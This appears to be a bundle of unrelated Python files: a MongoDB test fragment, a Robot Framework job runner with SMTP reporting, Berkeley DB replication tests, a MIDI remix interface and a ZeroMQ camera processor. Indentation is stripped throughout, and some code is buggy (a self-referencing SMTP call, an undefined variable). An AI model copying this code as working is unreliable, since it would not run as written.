conn.close()
def test_pinned_member(self):
latency = 1000 * 1000
conn = self._get_connection(
auto_start_request=False, secondary_acceptable_latency_ms=latency)
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
# No pinning since we're not in a request
assertReadFromAll(
self, conn, conn.secondaries,
ReadPreference.SECONDARY, None, latency)
assertReadFromAll(
self, conn, list(conn.secondaries) + [conn.primary],
ReadPreference.NEAREST, None, latency)
conn.start_request()
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
assertReadFrom(self, conn, host, ReadPreference.SECONDARY)
# Repin
primary = read_from_which_host(conn, ReadPreference.PRIMARY)
self.assertEqual(conn.primary, primary)
assertReadFrom(self, conn, primary, ReadPreference.NEAREST)
# Repin again
host = read_from_which_host(conn, ReadPreference.SECONDARY)
self.assertTrue(host in conn.secondaries)
assertReadFrom(self, conn, host, ReadPreference.SECONDARY)
# Unpin
conn.end_request()
assertReadFromAll(
self, conn, list(conn.secondaries) + [conn.primary],
ReadPreference.NEAREST, None, latency)
if __name__ == "__main__":
unittest.main()
|
run.py
|
# -*- coding: utf-8 -*-
__author__ = "苦叶子"
"""
公众号: 开源优测
Email: lymking@foxmail.com
"""
import sys
import codecs
from flask import current_app, session, url_for
from flask_mail import Mail, Message
import threading
from threading import Thread
import multiprocessing
import time
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import json
from robot.api import TestSuiteBuilder, ResultWriter, ExecutionResult
from utils.file import exists_path, make_nod, write_file, read_file, mk_dirs
def robot_job(app, name, username):
with app.app_context():
project = app.config["AUTO_HOME"] + "/workspace/%s/%s" % (username, name)
output = app.config["AUTO_HOME"] + "/jobs/%s/%s" % (username, name)
if not is_run(app, project):
p = multiprocessing.Process(target=robot_run, args=(username, name, project, output))
p.start()
app.config["AUTO_ROBOT"].append({"name": project, "process": p})
print("-+" * 15)
print(app.config["AUTO_ROBOT"])
print("-+" * 15)
def robot_run(username, name, project, output):
if not exists_path(output):
mk_dirs(output)
suite = TestSuiteBuilder().build(project)
(out, index) = reset_next_build_numb(output)
result = suite.run(output_directory=out,
output=out + "/output.xml",
debugfile=out + "/debug.txt",
loglevel="TRACE")
# reset_last_status(result, output, index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(result).write_results(report=out + '/report.html', log=out + '/log.html')
detail_result = ExecutionResult(out + "/output.xml")
# detail_result.save(out + "/output_new.xml")
reset_last_status(detail_result, output, index)
# Report and xUnit files can be generated based on the result object.
ResultWriter(detail_result).write_results(report=out + '/report.html', log=out + '/log.html')
send_robot_report(username, name, index, detail_result, out)
def reset_next_build_numb(output):
next_build_number = output + "/nextBuildNumber"
index = 1
data = "%d" % (index + 1)
if not exists_path(next_build_number):
make_nod(next_build_number)
else:
index = int(read_file(next_build_number)["data"])
data = "%d" % (index + 1)
write_file(next_build_number, data)
out = output + "/%d" % index
if not exists_path(output):
mk_dirs(output)
return (out, index)
def reset_last_status(result, output, index):
stats = result.statistics
fail = stats.total.critical.failed
last_fail = output + "/lastFail"
last_passed = output + "/lastPassed"
data = "%d" % index
if fail != 0:
if not exists_path(last_fail):
make_nod(last_fail)
write_file(last_fail, data)
else:
if not exists_path(last_passed):
make_nod(last_passed)
write_file(last_passed, data)
def remove_robot(app):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if not p["process"].is_alive():
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
def stop_robot(app, name):
lock = threading.Lock()
lock.acquire()
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
if p["process"].is_alive():
p["process"].terminate()
time.sleep(0.2)
app.config["AUTO_ROBOT"].remove(p)
break
lock.release()
return True
def is_run(app, name):
remove_robot(app)
for p in app.config["AUTO_ROBOT"]:
if name == p["name"]:
return True
return False
def send_robot_report(username, name, task_no, result, output):
app = current_app._get_current_object()
build_msg = "<font color='green'>Success</font>"
if result.statistics.total.critical.failed != 0:
build_msg = "<font color='red'>Failure</font>"
report_url = url_for("routes.q_view_report",
_external=True,
username=username,
project=name,
task=task_no)
msg = MIMEText("""Hello, %s<hr>
项目名称:%s<hr>
构建编号: %s<hr>
构建状态: %s<hr>
持续时间: %s毫秒<hr>
详细报告: <a href='%s'>%s</a><hr>
构建日志: <br>%s<hr><br><br>
(本邮件是程序自动下发的,请勿回复!)""" %
(username,
result.statistics.suite.stat.name,
task_no,
build_msg,
result.suite.elapsedtime,
report_url, report_url,
codecs.open(output + "/debug.txt", "r", "utf-8").read().replace("\n", "<br>")
),
"html", "utf-8")
msg["Subject"] = Header("AutoLink通知消息", "utf-8")
try:
user_path = app.config["AUTO_HOME"] + "/users/%s/config.json" % session["username"]
user_conf = json.load(codecs.open(user_path, 'r', 'utf-8'))
for p in user_conf["data"]:
if p["name"] == name:
if result.statistics.total.critical.failed != 0:
msg["To"] = p["fail_list"]
else:
msg["To"] = p["success_list"]
break
conf_path = app.config["AUTO_HOME"] + "/auto.json"
config = json.load(codecs.open(conf_path, 'r', 'utf-8'))
msg["From"] = config["smtp"]["username"]
if config["smtp"]["ssl"]:
smtp = smtplib.SMTP_SSL()
else:
smtp = smtp.SMTP()
# 连接至服务器
smtp.connect(config["smtp"]["server"], int(config["smtp"]["port"]))
# 登录
smtp.login(config["smtp"]["username"], config["smtp"]["password"])
# 发送邮件
smtp.sendmail(msg["From"], msg["To"].split(","), msg.as_string().encode("utf8"))
# 断开连接
smtp.quit()
except Exception as e:
print("邮件发送错误: %s" % e)
class RobotRun(threading.Thread):
def __init__(self, name, output, lock, executor="auto"):
threading.Thread.__init__(self)
self.lock = lock
self.project = name
self.output = output
self.executor = executor
self.suite = None
self.result = None
def run(self):
#lock = threading.Lock()
# self.lock.acquire()
if not exists_path(self.output):
mk_dirs(self.output)
self.suite = TestSuiteBuilder().build(self.project)
(output, index) = self.reset_next_build_numb()
self.setName(output)
self.result = self.suite.run(output_directory=output,
output=output + "/output.xml",
debugfile=output + "/debug.txt",
loglevel="TRACE")
# self.reset_last_status(index)
# Report and xUnit files can be generated based on the result object.
# ResultWriter(self.result).write_results(report=output + '/report.html', log=output + '/log.html')
# self.lock.release()
# Generating log files requires processing the earlier generated output XML.
# ResultWriter(self.output + '/output.xml').write_results()
self.result = ExecutionResult(out + "/output.xml")
self.reset_last_status(self.result, output, index)
# Report and xUnit files can be generated based on the result object.
ResultWriter(self.result).write_results(report=out + '/report.html', log=out + '/log.html')
def reset_next_build_numb(self):
next_build_number = self.output + "/nextBuildNumber"
index = 1
data = "%d" % (index + 1)
if not exists_path(next_build_number):
make_nod(next_build_number)
else:
index = int(read_file(next_build_number)["data"])
data = "%d" % (index + 1)
write_file(next_build_number, data)
output = self.output + "/%d" % index
if not exists_path(output):
mk_dirs(output)
return (output, index)
def reset_last_status(self, index):
stats = self.result.statistics
fail = stats.total.critical.failed
lock = threading.Lock()
lock.acquire()
last_fail = self.output + "/lastFail"
last_passed = self.output + "/lastPassed"
data = "%d" % index
if fail != 0:
if not exists_path(last_fail):
make_nod(last_fail)
write_file(last_fail, data)
else:
if not exists_path(last_passed):
make_nod(last_passed)
write_file(last_passed, data)
lock.release()
|
test_replication.py
|
"""TestCases for distributed transactions.
"""
import os
import time
import unittest
from test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplicationManager(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.confirmed_master=self.client_startupdone=False
def confirmed_master(a,b,c) :
if b==db.DB_EVENT_REP_MASTER :
self.confirmed_master=True
def client_startupdone(a,b,c) :
if b==db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone=True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
self.dbMaster = self.dbClient = None
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def test01_basic_replication(self) :
master_port = test_support.find_unused_port()
self.dbenvMaster.repmgr_set_local_site("127.0.0.1", master_port)
client_port = test_support.find_unused_port()
self.dbenvClient.repmgr_set_local_site("127.0.0.1", client_port)
self.dbenvMaster.repmgr_add_remote_site("127.0.0.1", client_port)
self.dbenvClient.repmgr_add_remote_site("127.0.0.1", master_port)
self.dbenvMaster.rep_set_nsites(2)
self.dbenvClient.rep_set_nsites(2)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_priority(0)
self.dbenvMaster.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100123)
self.dbenvClient.rep_set_timeout(db.DB_REP_CONNECTION_RETRY,100321)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100123)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_CONNECTION_RETRY), 100321)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100234)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 100432)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100234)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_TIMEOUT), 100432)
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100345)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_RETRY, 100543)
self.assertEquals(self.dbenvMaster.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100345)
self.assertEquals(self.dbenvClient.rep_get_timeout(
db.DB_REP_ELECTION_RETRY), 100543)
self.dbenvMaster.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvClient.repmgr_set_ack_policy(db.DB_REPMGR_ACKS_ALL)
self.dbenvMaster.repmgr_start(1, db.DB_REP_MASTER);
self.dbenvClient.repmgr_start(1, db.DB_REP_CLIENT);
self.assertEquals(self.dbenvMaster.rep_get_nsites(),2)
self.assertEquals(self.dbenvClient.rep_get_nsites(),2)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
self.assertEquals(self.dbenvMaster.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
self.assertEquals(self.dbenvClient.repmgr_get_ack_policy(),
db.DB_REPMGR_ACKS_ALL)
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
d = self.dbenvMaster.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], client_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
d = self.dbenvClient.repmgr_site_list()
self.assertEquals(len(d), 1)
self.assertEquals(d[0][0], "127.0.0.1")
self.assertEquals(d[0][1], master_port)
self.assertTrue((d[0][2]==db.DB_REPMGR_CONNECTED) or \
(d[0][2]==db.DB_REPMGR_DISCONNECTED))
if db.version() >= (4,6) :
d = self.dbenvMaster.repmgr_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("msgs_queued" in d)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
class DBBaseReplication(DBReplicationManager):
def setUp(self) :
DBReplicationManager.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import Queue
self.m2c = Queue.Queue()
self.c2m = Queue.Queue()
# There are only two nodes, so we don't need to
# do any routing decision
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEquals(self.dbenvMaster.rep_get_priority(),10)
self.assertEquals(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+10
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
d = self.dbenvMaster.rep_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("master_changes" in d)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v==None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v!=None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v==None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEquals(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v == None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
if db.version() >= (4,7) :
def test04_test_clockskew(self) :
fast, slow = 1234, 1230
self.dbenvMaster.rep_set_clockskew(fast, slow)
self.assertEqual((fast, slow),
self.dbenvMaster.rep_get_clockskew())
self.basic_rep_threading()
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
midointerface.py
|
"""
==========================================
Title: PyPlayer MidiInterface
Author: @jaquielajoie
Date: 9 July 2021
Liscence: Apache 2.0
==========================================
"""
import os
import mido
import base64
import math
import time
import logging
import threading
import mido
from mido import MidiFile
from pyplayer.markov import MarkovPlayer
from pyplayer.keycache import KeyCache
from pyplayer.sleepmanager import SleepManager
from mido import bpm2tempo
from mido.frozen import freeze_message
def config_backend(port_string='IAC Driver Bus 1'):
mido.set_backend('mido.backends.rtmidi')
port = mido.open_output(port_string)
return port
def config_hyperparams():
pass
def get_tracks(filepath):
midi = MidiFile(filepath)
return midi.tracks
def decompose_messages(frozen_messages):
notes = []
triggers = []
durations = []
for msg in frozen_messages:
notes.append(msg.note)
triggers.append(msg.type)
durations.append(msg.time)
return {"notes": notes, "triggers": triggers, "durations": durations}
def log(name, track, interface):
logging.info("Thread %s: starting", name)
for msg in track:
time.sleep(int((msg.time + name) / 240))# / 480)) #480 is the default ticks per 8th note
if msg.type != 'unknown_meta':
print(msg)
if not msg.is_meta:
interface.port.play_note(msg)
elif hasattr(msg, 'data'):
print('\nUnknown meta message type: ' + str(msg.type_byte) + '\nmsg data: ' + str(msg.data))
else:
print('\nUnknown meta message type: ' + str(msg.type_byte) + '\nNo data associated with unknown meta message')
logging.info("Thread %s: finishing", name)
"""
Parent: ThreadManager
Child: MidiInterface
Parent: MidiInterface (processes 1 track)
Children: [MarkovPlayer, KeyCache, SleepManager]
"""
class MidiInterface():
def __init__(self):
self.port = config_backend()
self.tracks = None
self.polyphony = 2
self.bpm = 120
self.bpm_scale = 4
self.semitones = 0
self.vel = 0
self.channel_number = 0
self.nlen = 1
self.playable = False
self.keycache = None
self.mp = None
self.sleepmanager = None
def make_playable(self, playing):
# marks interface playing status
self.playable = playing
# stops playing
if not playing:
self.mp.stop()
def config_tracks(self, filepath=None):
if filepath is None:
filepath = input('Enter in the full midi file path: ').rstrip()
self.tracks = get_tracks(filepath)
def set_nlen(self, nlen):
self.nlen = nlen
def set_channel_number(self, channel_number):
self.channel_number = channel_number
def set_tempo(self, bpm):
self.bpm = bpm
def shift_pitch(self, semitones):
self.semitones = semitones
def shift_velocity(self, vel):
self.vel = vel
def freeze_messages(self, track):
frozen = []
for m in track:
if m.type in ['note_on', 'note_off']:
m.velocity = abs(m.velocity + self.vel) % 127 # add floor
m.note = abs(m.note + self.semitones) % 127 # maybe this should be handled better...
msg = freeze_message(m)
frozen.append(msg)
return frozen
def play_note(self, play, keycache):
msg = mido.Message(play["trigger"], note=play["note"], time=play["duration"])
if msg.is_meta: # Not possible as of 7-12-21
return
keycache.process(msg)
return msg
def play_tracks(self, nlen=None): # nlen not used, just for debugging convience [will delete]
for i, track in enumerate(midi_interface.tracks):
print(f"Track {i}: {track.name}")
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
logging.info('Creating new channel_midi (MidiInterface.play_tracks)')
channel_midi = threading.Thread(target=log, args=(i, track, midi_interface.port))
logging.info("play_tracks: before starting thread")
channel_midi.start()
logging.info("play_tracks: waiting for the thread to finish")
logging.info("play_tracks: finised thread")
def remix_track(self, iters, bus):
# channel_number = min( (len(self.tracks) - 1 ), self.channel_number )
self.port = config_backend(port_string=bus)
"""
Safety check -->
Many midi files have blank tracks that cannot generate markov models if used.
"""
midi_lists = []
for track in self.tracks:
midi_list = decompose_messages(self.freeze_messages(track))
midi_lists.append(midi_list)
largest_ml = {"notes": [], "triggers": [], "durations": []}
for ml in midi_lists:
if len(ml["notes"]) > len(largest_ml["notes"]): # notes, triggers, durations should be same len
largest_ml = ml
midi_list = largest_ml
"""
Set up & run
"""
self.mp = MarkovPlayer(nlen=self.nlen, midi_list=midi_list, interface=self)
self.keycache = KeyCache(port=self.port, polyphony=self.polyphony, channel_number=self.channel_number)
self.sleepmanager = SleepManager(bpm=self.bpm)
self.mp.run(iters, self.keycache, self.sleepmanager)
# turn all notes off
self.keycache.nuke()
if __name__ == "__main__":
midi_interface = MidiInterface()
midi_interface.config_tracks()
midi_interface.remix_track(nlen=4)
|
camera_process_video_task.py
|
'''
camera_process_video_task.py
ancilla
Created by Kevin Musselman (kevin@frenzylabs.com) on 01/21/20
Copyright 2019 FrenzyLabs, LLC.
'''
import threading
import time
import sys
import os
import zmq
from zmq.eventloop.zmqstream import ZMQStream
import zmq.utils.monitor
# import zmq.asyncio
import json
from tornado.ioloop import IOLoop
# from zmq.eventloop.ioloop import PeriodicCallback
from ..zhelpers import zpipe
from ...data.models import PrintSlice, CameraRecording
# from .devices import *
from asyncio import sleep
# from tornado.gen import sleep
from .ancilla_task import AncillaTask
from ...env import Env
from ..events.camera import Camera
import datetime
import pickle
import cv2
import numpy as np
import gc
class CameraProcessVideoTask(AncillaTask):
def __init__(self, name, service, payload, *args):
super().__init__(name, *args)
# self.request_id = request_id
self.current_frame = None
self.current_framenum = None
self.payload = payload
self.camera_model = self.payload.get("camera") or {}
self.camera_settings = self.camera_model.get("settings") or {}
self.video_settings = self.camera_settings.get("video") or {"size": [640, 480]}
width, height = self.video_settings.get("size") or [640, 480]
self.video_size = (width, height)
self.service = service
self.state.update({"name": name, "status": "pending", "model": {}})
self.processed_stream = f"ipc://{self.service.identity}_image_processor.ipc"
self.processing_thread = None
self.running = False
self.current_frame = None
image_collector = self.service.process.ctx.socket(zmq.SUB)
image_collector.setsockopt(zmq.RCVHWM, 10)
# image_collector.setsockopt(zmq.CONFLATE, 1)
# image_collector.setsockopt(zmq.RCVBUF, 2*1024)
image_collector.connect(self.service.process.pubsub_address)
self.image_collector = ZMQStream(image_collector)
self.image_collector.linger = 0
self.image_collector.on_recv(self.on_data, copy=True)
image_collector.setsockopt(zmq.SUBSCRIBE, b'data.camera.data_received')
image_collector.setsockopt(zmq.SUBSCRIBE, b'events.camera.connection.closed')
self.ready = True
def on_data(self, msg):
# identity, identifier, frm_num, frame = data
if len(msg) != 4:
# print(f"DATA = {msg[0]}", flush=True)
# if 'bytes' in msg[0]:
# if msg[0].bytes.endswith(b'connection.closed'):
# self.running = False
# self.state.status = "closed"
if msg[0].endswith(b'connection.closed'):
self.running = False
self.state.status = "closed"
return
else:
topic, identifier, framenum, imgdata = msg
fnum = int(framenum.decode('utf-8'))
# print(f"DATA = {topic}", flush=True)
self.current_framenum = fnum
self.current_frame = [topic, framenum, imgdata]
async def run(self, *args):
self.running = True
self.state.status = "running"
if not self.processing_thread or not self.processing_thread.isAlive():
self.processing_thread = threading.Thread(target=self.process_images, args=(self.service.process.ctx,))
self.processing_thread.daemon = True
# self.thread_read.name = 'camera->reader'
self.processing_thread.start()
while self.state.status == "running":
await sleep(1)
print("FINISHED PROCESSING", flush=True)
self.running = False
self.image_collector.close()
def process_images(self, ctx):
# print(f"RUN Camera Image Processor SERVER: {self.processed_stream}", flush=True)
self.publish_data = ctx.socket(zmq.XPUB)
# self.publish_data.setsockopt(zmq.SNDHWM, 100)
# self.publish_data.setsockopt(zmq.SNDBUF, 2*1024)
self.publish_data.bind(self.processed_stream)
# self._mon_socket = self.publish_data.get_monitor_socket(zmq.EVENT_CONNECTED | zmq.EVENT_DISCONNECTED)
# self._mon_stream = ZMQStream(self._mon_socket)
# self._mon_stream.on_recv(self._on_mon)
self.timer = time.time()
self.subsription_time = time.time()
poller = zmq.Poller()
# poller.register(image_collector, zmq.POLLIN)
poller.register(self.publish_data, zmq.POLLIN)
# poller.register(self._mon_socket, zmq.POLLIN)
self.subscribers = {}
framenum = 0
while self.running:
try:
if len(self.subscribers.keys()) == 0 and (time.time() - self.subsription_time) > 10:
self.state.status = "idle-close"
break
try:
items = dict(poller.poll(1))
except:
break # Interrupted4
if framenum != self.current_framenum and self.current_frame:
# if self.current_framenum - framenum > 1:
# print(f'Frame: l: {framenum}, cur: {self.current_framenum}')
self.process_img(self.current_frame)
framenum = self.current_framenum
if self.publish_data in items:
event = self.publish_data.recv()
if event[0] == 0:
topic = event[1:]
if topic in self.subscribers:
del self.subscribers[topic]
print(f"PUBLISH SOCKET has UNSubscribed {topic}")
self.subsription_time = time.time()
elif event[0] == 1:
topic = event[1:]
if len(topic) > 1:
self.subscribers[topic] = time.time()
print(f"PUBLISH SOCKET has subscribed {topic}")
except Exception as e:
print(f'Exception with Camera Process: {str(e)}', flush=True)
if self.publish_data:
self.publish_data.send_multipart([self.service.identity + b'.error', b'error', str(e).encode('ascii')], copy=True)
# device_collector.send_multipart([self.identity, b'error', str(e).encode('ascii')])
break
if self.publish_data and self.state.status == "closed":
try:
self.publish_data.send_multipart([self.service.identity + b'.connection.closed', b"Connection Closed"], copy=True)
except:
pass
self.publish_data.close()
self.publish_data = None
def process_img(self, data):
topic, framenum, msg = data
# fnum = int(framenum.decode('utf-8'))
if not self.ready:
return
self.ready = False
frame = pickle.loads(msg)
# frame = np.frombuffer(frame, dtype="int8")
# frame = np.fromstring(frame , np.uint8)
frame = cv2.flip(frame, 1)
# x = frame
x = cv2.resize(frame, dsize=self.video_size, interpolation=cv2.INTER_CUBIC)
# # print(x.shape)
# x = x.astype(np.uint8)
# encodedImage = x
